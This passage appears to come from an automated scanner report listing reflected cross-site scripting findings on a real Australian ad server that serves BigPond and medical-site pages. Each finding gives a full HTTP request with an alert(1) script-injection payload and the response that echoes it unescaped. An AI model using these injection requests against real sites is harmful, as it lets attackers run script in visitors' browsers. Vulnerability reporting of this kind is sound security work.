Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:18 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 671
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=000D787331120CEB1778D2E561626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00031a960000000000000000/acc_randomfefb4"><script>alert(1)</script>ced29f7a466=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415/relocate=http://bs.serving-sys.com/Burst
...[SNIP]...

2.600. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3177"><script>alert(1)</script>6beb5a613e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415?d3177"><script>alert(1)</script>6beb5a613e1=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:14 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 472
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=00048683310E0CEB1949914761626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=00033b0c0000000000000000/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415?d3177"><script>alert(1)</script>6beb5a613e1=1&relocate=http://clk.redcated/OMA/go/270181140/direct/01/"target="_blank">
...[SNIP]...

2.601. http://media.sensis.com.au/hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8659e'-alert(1)-'13eb8f70bdf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415?8659e'-alert(1)-'13eb8f70bdf=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://go.bigpond.com/bphf/header/adh.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:16 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2448
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=0006633E31100CEB660BCC3B61626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<!--Begin JSERVER Skip-->
<script>
document.write('<scr'+'ipt src="https://ad.au.vulnerable.ad.partner/adj/N799.Sensis12/B4870169.2;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=100x29/POSITION=headernav/pageid=365717345415?8659e'-alert(1)-'13eb8f70bdf=1&relocate=;click=http://media.sensis.com.au/ADCLICK/CID=00031a5f0000000000000000/acc_random=33539581968/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.HOMEPAGE
...[SNIP]...

2.602. http://media.sensis.com.au/hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 557b0"><script>alert(1)</script>bb252471257 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver557b0"><script>alert(1)</script>bb252471257/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:45 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 432
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fda5822e9500000000557b0"><script>alert(1)</script>bb252471257/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691" target="_new">
...[SNIP]...

2.603. http://media.sensis.com.au/hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47686"><script>alert(1)</script>1e19f0fcce5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random47686"><script>alert(1)</script>1e19f0fcce5=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:46 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 432
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fda5822e9500000000/acc_random47686"><script>alert(1)</script>1e19f0fcce5=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691" target="_new">
...[SNIP]...

2.604. http://media.sensis.com.au/hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38714"><script>alert(1)</script>1e4ab45adc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691?38714"><script>alert(1)</script>1e4ab45adc4=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: media.sensis.com.au
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:44 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 435
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/;
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fda5822e9500000000/acc_random=376434999900/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=942103891691?38714"><script>alert(1)</script>1e4ab45adc4=1" target="_new">
...[SNIP]...

2.605. http://media.sensis.com.au/hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6427f"><script>alert(1)</script>cd5e996c04f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver6427f"><script>alert(1)</script>cd5e996c04f/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:30 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e000000006427f"><script>alert(1)</script>cd5e996c04f/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREAT
...[SNIP]...

2.606. http://media.sensis.com.au/hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96f73"><script>alert(1)</script>1f9804549a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random96f73"><script>alert(1)</script>1f9804549a0=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:31 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 511
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e00000000/acc_random96f73"><script>alert(1)</script>1f9804549a0=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid
...[SNIP]...

2.607. http://media.sensis.com.au/hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fbe4"><script>alert(1)</script>01cfc1bbbb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?3fbe4"><script>alert(1)</script>01cfc1bbbb7=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:29 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 514
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000342fa92cb881e00000000/acc_random=377552078934/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?3fbe4"><script>alert(1)</script>01cfc1bbbb7=1" target="_new">
...[SNIP]...

2.608. http://media.sensis.com.au/hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccc78"><script>alert(1)</script>99b00bcabad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverccc78"><script>alert(1)</script>99b00bcabad/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 23 Nov 2010 03:12:33 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 503
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=000215ba92cb881e00000000ccc78"><script>alert(1)</script>99b00bcabad/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT
...[SNIP]...

2.609. http://media.sensis.com.au/hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=454005787339/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 419f5"><script>alert(1)</script>1d85051ff8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

